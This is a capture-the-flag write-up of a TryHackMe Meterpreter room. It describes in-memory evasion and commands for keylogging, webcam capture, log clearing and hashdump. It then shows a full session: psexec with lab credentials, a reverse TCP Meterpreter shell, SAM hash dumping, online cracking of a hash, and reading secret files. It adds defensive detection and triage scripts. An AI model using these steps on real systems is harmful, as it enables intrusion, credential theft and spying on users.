Introduction to Meterpreter
Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture. You will interact with the target operating system and files and use Meterpreter's specialized commands.
Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to the disk on the target. This feature aims to avoid being detected during antivirus scans. By default, most antivirus software will scan new files on the disk (e.g. when you download a file from the internet). Meterpreter runs in memory (RAM - Random Access Memory) to avoid having a file that has to be written to the disk on the target system (e.g. meterpreter.exe). This way, Meterpreter will be seen as a process and not have a file on the target system.
Meterpreter also aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication with the server where Metasploit runs (typically your attacking machine). If the target organization does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming to and going out of the local network, IPS and IDS solutions will not be able to detect its activities.
While Meterpreter is recognized by major antivirus software, this feature provides some degree of stealth.
The example below shows a target Windows machine exploited using the MS17-010 vulnerability. You will see Meterpreter is running with a process ID (PID) of 1304; this PID will be different in your case.
We have used the getpid command, which returns the process ID with which Meterpreter is running. The process ID (or process identifier) is used by operating systems to identify running processes. All processes running in Linux or Windows will have a unique ID number; this number is used to interact with the process when the need arises (e.g. if it needs to be stopped).
Getpid
meterpreter > getpid
Current pid: 1304
If we list processes running on the target system using the ps command, we see PID 1304 is spoolsv.exe and not Meterpreter.exe, as one might expect.
The ps command
meterpreter > ps
Even if we were to go a step further and look at the DLLs (Dynamic-Link Libraries) used by the Meterpreter process (PID 1304 in this case), we still would not find anything jumping out at us (e.g. no meterpreter.dll).
C:\Windows\system32>tasklist /m /fi "pid eq 1304"
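Because the implant described above leaves no file and no tell-tale DLL, a defender has to look at behaviour instead. The following added example (not part of the room, and not Metasploit code) applies a baseline-deviation check to process and connection records in the shape of Meterpreter's own ps and netstat output: Windows service images such as spoolsv.exe that hold an ESTABLISHED TCP session to a remote endpoint the clean baseline never saw are flagged. The baseline, image list and all sample records are constructed.

```python
import ipaddress
from collections import namedtuple

# Constructed records mirroring the columns of `ps` and `netstat`
# (pid, image name / pid, proto, local, remote, state).
Proc = namedtuple("Proc", "pid name")
Conn = namedtuple("Conn", "pid proto local remote state")

# Per-image allowlist of remote endpoints learned from a clean baseline of the
# same host (constructed values). An empty set means "never initiates sessions".
BASELINE = {
    "spoolsv.exe": set(),                              # print spooler
    "lsass.exe": {"10.0.0.10:389", "10.0.0.10:88"},    # domain controller
    "svchost.exe": {"10.0.0.20:80"},                   # update server
}

def is_loopback(endpoint: str) -> bool:
    """True for 127.0.0.0/8 or ::1 endpoints written as host:port / [host]:port."""
    host = endpoint.rpartition(":")[0].strip("[]")
    return ipaddress.ip_address(host).is_loopback

def baseline_deviations(procs, conns, baseline=BASELINE):
    """Return (pid, image, remote) for baselined service images holding an
    ESTABLISHED TCP session to a non-loopback endpoint the baseline does not allow."""
    image_of = {p.pid: p.name.lower() for p in procs}
    hits = []
    for c in conns:
        image = image_of.get(c.pid)
        if image not in baseline or c.proto != "tcp" or c.state != "ESTABLISHED":
            continue
        if is_loopback(c.remote) or c.remote in baseline[image]:
            continue
        hits.append((c.pid, image, c.remote))
    return hits

# Constructed snapshot: PID 1304 is spoolsv.exe hosting an implant, as in the room.
SAMPLE_PROCS = [Proc(4, "System"), Proc(612, "lsass.exe"), Proc(904, "svchost.exe"),
                Proc(1304, "spoolsv.exe"), Proc(2210, "chrome.exe")]
SAMPLE_CONNS = [
    Conn(612, "tcp", "10.0.0.50:49712", "10.0.0.10:389", "ESTABLISHED"),
    Conn(904, "tcp", "10.0.0.50:49720", "10.0.0.20:80", "ESTABLISHED"),
    Conn(1304, "tcp", "10.0.0.50:49731", "10.0.0.99:4444", "ESTABLISHED"),  # C2 session
    Conn(1304, "tcp", "10.0.0.50:49735", "127.0.0.1:135", "ESTABLISHED"),   # local RPC, benign
    Conn(2210, "tcp", "10.0.0.50:49740", "203.0.113.7:443", "ESTABLISHED"), # browser, not baselined
    Conn(4, "tcp", "0.0.0.0:445", "0.0.0.0:0", "LISTENING"),
]

if __name__ == "__main__":
    for pid, image, remote in baseline_deviations(SAMPLE_PROCS, SAMPLE_CONNS):
        print(f"ALERT pid={pid} {image} -> {remote} (not in baseline)")
```

A real deployment would feed this from EDR or Sysmon network events and refresh the baseline per host role; the logic is the same.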
Meterpreter Flavors
Metasploit payloads can be initially divided into two categories:
- inline (also called single)
- staged
Staged payloads are sent to the target in two steps. An initial part (the stager) is installed and requests the rest of the payload. This allows for a smaller initial payload size.
Inline payloads are sent in a single step.
Meterpreter payloads are also divided into staged and inline versions.
However, Meterpreter has a wide range of different versions you can choose from based on your target system.
The easiest way to have an idea about available Meterpreter versions could be to list them using msfvenom, as seen below.
We have used the msfvenom --list payloads command and grepped "meterpreter" payloads (adding | grep meterpreter to the command line), so the output only shows these. You can try this command on the AttackBox.
root@ip-10-10-186-44:~# msfvenom --list payloads | grep meterpreter
The list will show Meterpreter versions available for the following platforms:
- Android
- Apple iOS
- Java
- Linux
- OSX
- PHP
- Python
- Windows
Your decision on which version of Meterpreter to use will be mostly based on three factors:
- The target operating system (Is the target operating system Linux or Windows? Is it a Mac device? Is it an Android phone? etc.)
- Components available on the target system (Is Python installed? Is this a PHP website? etc.)
- Network connection types you can have with the target system (Do they allow raw TCP connections? Can you only have an HTTPS reverse connection? Are IPv6 addresses not as closely monitored as IPv4 addresses? etc.)
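The names printed by the msfvenom listing encode the choices just described. As an added example (not part of the room, not Metasploit's own code), the parser below classifies payload names by Metasploit's naming convention: a slash between meterpreter and the transport (windows/x64/meterpreter/reverse_tcp) marks a staged payload, an underscore (windows/x64/meterpreter_reverse_https) an inline one; the transport prefix gives the connection direction. The listing it parses is a constructed excerpt with paraphrased descriptions.

```python
import re
from collections import Counter, namedtuple

Payload = namedtuple("Payload", "platform arch staging direction transport")

# Name grammar: <platform>[/<arch>]/meterpreter<sep><transport>, where <sep> is "/"
# for staged payloads (stager + stage) and "_" for inline (stageless) ones.
PAYLOAD_RE = re.compile(
    r"^(?P<platform>[a-z_]+)"
    r"(?:/(?P<arch>x86|x64|aarch64|armle|mipsbe|mipsle|ppc|ppc64le))?"
    r"/meterpreter(?P<sep>[/_])(?P<transport>[a-z0-9_]+)$")

def parse_payload(name: str):
    """Classify one payload name; returns None for names that are not Meterpreter."""
    m = PAYLOAD_RE.match(name)
    if not m:
        return None
    transport = m["transport"]
    if transport.startswith("reverse_"):
        direction = "reverse"        # target connects back to the handler
    elif transport.startswith("bind_"):
        direction = "bind"           # target listens, handler connects in
    else:
        direction = "other"
    staging = "staged" if m["sep"] == "/" else "inline"
    return Payload(m["platform"], m["arch"] or "(platform default)", staging, direction, transport)

def parse_listing(listing: str):
    """Parse a `msfvenom --list payloads | grep meterpreter` excerpt: the name is the
    first whitespace-delimited column, everything after it is free-text description."""
    payloads = []
    for line in listing.splitlines():
        fields = line.split()
        if fields:
            parsed = parse_payload(fields[0])
            if parsed:
                payloads.append(parsed)
    return payloads

def summarize(listing: str) -> Counter:
    """Count payloads per (platform, staging) pair."""
    return Counter((p.platform, p.staging) for p in parse_listing(listing))

# Constructed excerpt; descriptions are paraphrased, not msfvenom's real text.
SAMPLE_LISTING = """\
    android/meterpreter/reverse_tcp              Meterpreter for Android, connect-back stager
    android/meterpreter_reverse_tcp              Meterpreter for Android, stageless
    apple_ios/aarch64/meterpreter_reverse_tcp    Meterpreter for iOS, stageless
    linux/x64/meterpreter/reverse_tcp            Mettle (Linux Meterpreter), staged
    php/meterpreter/reverse_tcp                  Meterpreter in PHP, connect-back stager
    python/meterpreter/bind_tcp                  Meterpreter in Python, listens for the handler
    windows/meterpreter/reverse_tcp              Reflective DLL Meterpreter, staged
    windows/x64/meterpreter/reverse_tcp          Reflective DLL Meterpreter, staged
    windows/x64/meterpreter_reverse_https        Stageless Meterpreter over HTTPS
"""

if __name__ == "__main__":
    for (platform, staging), n in sorted(summarize(SAMPLE_LISTING).items()):
        print(f"{platform:10} {staging:7} {n}")
```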
Meterpreter Commands
Typing help on any Meterpreter session (shown by meterpreter> at the prompt) will list all available commands.
Every version of Meterpreter will have different command options, so running the help command is always a good idea. Commands are built-in tools available on Meterpreter. They will run on the target system without loading any additional script or executable files.
Meterpreter will provide you with three primary categories of tools:
- Built-in commands
- Meterpreter tools
- Meterpreter scripting
If you run the help command, you will see Meterpreter commands are listed under different categories.
- Core commands
- File system commands
- Networking commands
- System commands
- User interface commands
- Webcam commands
- Audio output commands
- Elevate commands
- Password database commands
- Timestomp commands
Please note that the list above was taken from the output of the help command on the Windows version of Meterpreter (windows/x64/meterpreter/reverse_tcp). These will be different for other Meterpreter versions.
Below are some of the most commonly used. Remember to check all available commands by running the help command once a Meterpreter session has started.
Core commands
- background: Backgrounds the current session
- exit: Terminate the Meterpreter session
- guid: Get the session GUID (Globally Unique Identifier)
- help: Displays the help menu
- info: Displays information about a Post module
- irb: Opens an interactive Ruby shell on the current session
- load: Loads one or more Meterpreter extensions
- migrate: Allows you to migrate Meterpreter to another process
- run: Executes a Meterpreter script or Post module
- sessions: Quickly switch to another session
File system commands
- cd: Will change directory
- ls: Will list files in the current directory (dir will also work)
- pwd: Prints the current working directory
- edit: Will allow you to edit a file
- cat: Will show the contents of a file to the screen
- rm: Will delete the specified file
- search: Will search for files
- upload: Will upload a file or directory
- download: Will download a file or directory
Networking commands
- arp: Displays the host ARP (Address Resolution Protocol) cache
- ifconfig: Displays network interfaces available on the target system
- netstat: Displays the network connections
- portfwd: Forwards a local port to a remote service
- route: Allows you to view and modify the routing table
System commands
- clearev: Clears the event logs
- execute: Executes a command
- getpid: Shows the current process identifier
- getuid: Shows the user that Meterpreter is running as
- kill: Terminates a process
- pkill: Terminates processes by name
- ps: Lists running processes
- reboot: Reboots the remote computer
- shell: Drops into a system command shell
- shutdown: Shuts down the remote computer
- sysinfo: Gets information about the remote system, such as OS
Other commands (these will be listed under different menu categories in the help menu)
- idletime: Returns the number of seconds the remote user has been idle
- keyscan_dump: Dumps the keystroke buffer
- keyscan_start: Starts capturing keystrokes
- keyscan_stop: Stops capturing keystrokes
- screenshare: Allows you to watch the remote user's desktop in real time
- screenshot: Grabs a screenshot of the interactive desktop
- record_mic: Records audio from the default microphone for X seconds
- webcam_chat: Starts a video chat
- webcam_list: Lists webcams
- webcam_snap: Takes a snapshot from the specified webcam
- webcam_stream: Plays a video stream from the specified webcam
- getsystem: Attempts to elevate your privilege to that of local system
- hashdump: Dumps the contents of the SAM database
Post-Exploitation with Meterpreter
Meterpreter provides you with many useful commands that facilitate the post-exploitation phase. Below are a few examples you will often use.
- getuid: Will display the user with which Meterpreter is currently running.
- ps: Will list running processes.
- migrate: Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session. Usage: migrate <PID>. Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.
- hashdump: Will list the content of the SAM database. The SAM (Security Account Manager) database stores users' passwords on Windows systems. These passwords are stored in the NTLM (New Technology LAN Manager) format.
- search: Useful to locate files with potentially juicy information. Usage: search -f flag2.txt
- shell: Will launch a regular command-line shell on the target system. Pressing CTRL+Z or typing exit will help you go back to the Meterpreter shell.
Post-Exploitation Challenge
Commands mentioned previously, such as getsystem and hashdump, will provide important leverage and information for privilege escalation and lateral movement. Meterpreter is also a good base you can use to run post-exploitation modules available in the Metasploit framework. Finally, you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.
meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!
meterpreter >
The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.
- Gathering further information about the target system.
- Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
- Privilege escalation.
- Lateral movement.
Once any additional tool is loaded using the load command, you will see new options on the help menu. The example below shows commands added for the Kiwi module (using the load kiwi command).
The questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation.
You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec).
Username: ballen
Password: Password1
Answer the questions
What is the computer name?
root@ip-10-10-30-254:~# msfconsole
msf6 > db_nmap -A -nn 10.10.143.34
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-19 16:08 BST
[*] Nmap: Nmap scan report for 10.10.143.34
[*] Nmap: Host is up (0.00075s latency).
[*] Nmap: Not shown: 987 filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 53/tcp open domain?
[*] Nmap: | fingerprint-strings:
[*] Nmap: | DNSVersionBindReqTCP:
[*] Nmap: | version
[*] Nmap: |_ bind
[*] Nmap: 80/tcp open http Microsoft IIS httpd 10.0
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Microsoft-IIS/10.0
[*] Nmap: |_http-title: IIS Windows Server
[*] Nmap: 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-19 15:08:54Z)
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 464/tcp open kpasswd5?
[*] Nmap: 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
[*] Nmap: 636/tcp open tcpwrapped
[*] Nmap: 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
[*] Nmap: 3269/tcp open tcpwrapped
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
[*] Nmap: | rdp-ntlm-info:
[*] Nmap: | Target_Name: FLASH
[*] Nmap: | NetBIOS_Domain_Name: FLASH
[*] Nmap: | NetBIOS_Computer_Name: ACME-TEST
[*] Nmap: | DNS_Domain_Name: FLASH.local
[*] Nmap: | DNS_Computer_Name: ACME-TEST.FLASH.local
[*] Nmap: | Product_Version: 10.0.17763
[*] Nmap: |_ System_Time: 2025-10-19T15:11:14+00:00
[*] Nmap: | ssl-cert: Subject: commonName=ACME-TEST.FLASH.local
[*] Nmap: | Not valid before: 2025-10-18T14:55:18
[*] Nmap: |_Not valid after: 2026-04-19T14:55:18
[*] Nmap: |_ssl-date: 2025-10-19T15:11:54+00:00; 0s from scanner time.
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port53-TCP:V=7.80%I=7%D=10/19%Time=68F4FF0C%P=x86_64-pc-linux-gnu%r(DNS
[*] Nmap: SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
[*] Nmap: SF:\x04bind\0\0\x10\0\x03");
[*] Nmap: MAC Address: 02:C3:59:7E:08:93 (Unknown)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
[*] Nmap: No OS matches for host
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: ACME-TEST; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: ACME-TEST, NetBIOS user: <unknown>, NetBIOS MAC: 02:c3:59:7e:08:93 (unknown)
[*] Nmap: | smb2-security-mode:
[*] Nmap: | 2.02:
[*] Nmap: |_ Message signing enabled and required
[*] Nmap: | smb2-time:
[*] Nmap: | date: 2025-10-19T15:11:14
[*] Nmap: |_ start_date: N/A
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.75 ms 10.10.143.34
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 194.01 seconds
msf6 > setg RHOSTS 10.10.143.34
RHOSTS => 10.10.143.34
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set SMBUser ballen
SMBUser => ballen
msf6 exploit(windows/smb/psexec) > set SMBPass Password1
SMBPass => Password1
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.30.254:4444
[*] 10.10.143.34:445 - Connecting to the server...
[*] 10.10.143.34:445 - Authenticating to 10.10.143.34:445 as user 'ballen'...
[*] 10.10.143.34:445 - Selecting PowerShell target
[*] 10.10.143.34:445 - Executing the payload...
[+] 10.10.143.34:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 10.10.143.34
[*] Meterpreter session 1 opened (10.10.30.254:4444 -> 10.10.143.34:63482) at 2025-10-19 16:17:30 +0100
meterpreter > sysinfo
Computer : ACME-TEST
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FLASH
Logged On Users : 8
Meterpreter : x86/windows
meterpreter >
Answer: ACME-TEST
What is the target domain?
Answer: FLASH
What is the name of the share likely created by the user?
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > search type:post smb
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/linux/busybox/smb_share_root . normal No BusyBox SMB Sharing
1 post/linux/gather/mount_cifs_creds . normal No Linux Gather Saved mount.cifs/mount.smbfs Credentials
2 post/windows/escalate/droplnk . normal No Windows Escalate SMB Icon LNK Dropper
3 post/windows/gather/credentials/gpp . normal No Windows Gather Group Policy Preference Saved Passwords
4 post/windows/gather/word_unc_injector . normal No Windows Gather Microsoft Office Word UNC Path Injector
5 post/windows/gather/enum_shares . normal No Windows Gather SMB Share Enumeration via Registry
6 post/windows/gather/netlm_downgrade . normal No Windows NetLM Downgrade Attack
Interact with a module by name or index. For example info 6, use 6 or use post/windows/gather/netlm_downgrade
msf6 exploit(windows/smb/psexec) > use 5
msf6 post(windows/gather/enum_shares) > show options
Module options (post/windows/gather/enum_shares):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently configured shares
ENTERED true yes Enumerate recently entered UNC Paths in the Run Dialog
RECENT true yes Enumerate recently mapped shares
SESSION yes The session to run this module on
View the full module info with the info, or info -d command.
msf6 post(windows/gather/enum_shares) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/enum_shares) > run
[*] Running module against ACME-TEST (10.10.143.34)
[*] The following shares were found:
[*] Name: SYSVOL
[*] Path: C:\Windows\SYSVOL\sysvol
[*] Remark: Logon server share
[*] Type: DISK
[*]
[*] Name: NETLOGON
[*] Path: C:\Windows\SYSVOL\sysvol\FLASH.local\SCRIPTS
[*] Remark: Logon server share
[*] Type: DISK
[*]
[*] Name: speedster
[*] Path: C:\Shares\speedster
[*] Type: DISK
[*]
[*] Post module execution completed
msf6 post(windows/gather/enum_shares) >
Answer: speedster
What is the NTLM hash of the jchambers user?
msf6 post(windows/gather/enum_shares) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:22a7966f029f5db5934ffeb0deb9c792:::
meterpreter >
Answer: 69596c7aa1e8daee17f8e78870e25a5c
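Every line of the hashdump output above has the form user:RID:LM hash:NT hash:::, and from a defender's side such a dump means every account in it needs rotating; the question is which first. The following added example (not part of the room) parses that format and triages it: privileged RIDs, machine accounts, the empty-password NT hash (31d6cfe0d16ae931b73c59d7e0c089c0, which the Guest line above carries), accounts that still store a legacy LM hash, and passwords reused across accounts (identical NT hash, since NT hashing is unsalted). The sample dump is constructed and its hex values, apart from the two well-known constants, are made up.

```python
import re
from collections import namedtuple

# Well-known constants in hashdump / pwdump lines (user:RID:LM:NT:::).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

Account = namedtuple("Account", "user rid lm nt")
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

def parse_hashdump(text: str):
    """Return one Account per well-formed hashdump line; other lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append(Account(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts

def triage(accounts):
    """Map each user to the findings that drive response priority after a dump."""
    owners = {}                                  # NT hash -> users holding it
    for a in accounts:
        owners.setdefault(a.nt, []).append(a.user)
    findings = {}
    for a in accounts:
        notes = []
        if a.rid == 500:
            notes.append("built-in Administrator")
        if a.rid == 502:
            notes.append("krbtgt (Kerberos key material exposed)")
        if a.user.endswith("$"):
            notes.append("machine account")
        if a.nt == EMPTY_NT:
            notes.append("empty password")
        if a.lm != EMPTY_LM:
            notes.append("LM hash stored")
        others = [u for u in owners[a.nt] if u != a.user]
        if others and a.nt != EMPTY_NT:
            notes.append("password shared with " + ", ".join(sorted(others)))
        findings[a.user] = notes
    return findings

# Constructed sample in the room's hashdump format; hex values other than the two
# constants above are made up and do not correspond to any real password.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
alice:1112:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
bob:1113:aabbccddeeff00112233445566778899:00112233445566778899aabbccddeeff:::
SRV01$:1008:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""

if __name__ == "__main__":
    for user, notes in triage(parse_hashdump(SAMPLE_DUMP)).items():
        print(f"{user:14} {'; '.join(notes) or '-'}")
```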
What is the cleartext password of the jchambers user?
- https://hashes.com/en/decrypt/hash
69596c7aa1e8daee17f8e78870e25a5c:Trustno1
Answer: Trustno1
Where is the "secrets.txt" file located? (Full path of the file)
meterpreter > search -f secrets.txt
Answer: c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt
What is the Twitter password revealed in the "secrets.txt" file?
meterpreter > shell
Process 612 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>type "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
type "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
My Twitter password is KDSvbsw3849!
C:\Windows>
Answer: KDSvbsw3849!
Where is the "realsecret.txt" file located? (Full path of the file)
C:\Windows>exit
exit
meterpreter > search -f realsecret.txt
Answer: c:\inetpub\wwwroot\realsecret.txt
What is the real secret?
meterpreter > shell
Process 3444 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>type "c:\inetpub\wwwroot\realsecret.txt"
type "c:\inetpub\wwwroot\realsecret.txt"
The Flash is the fastest man alive
C:\Windows>
Answer: The Flash is the fastest man alive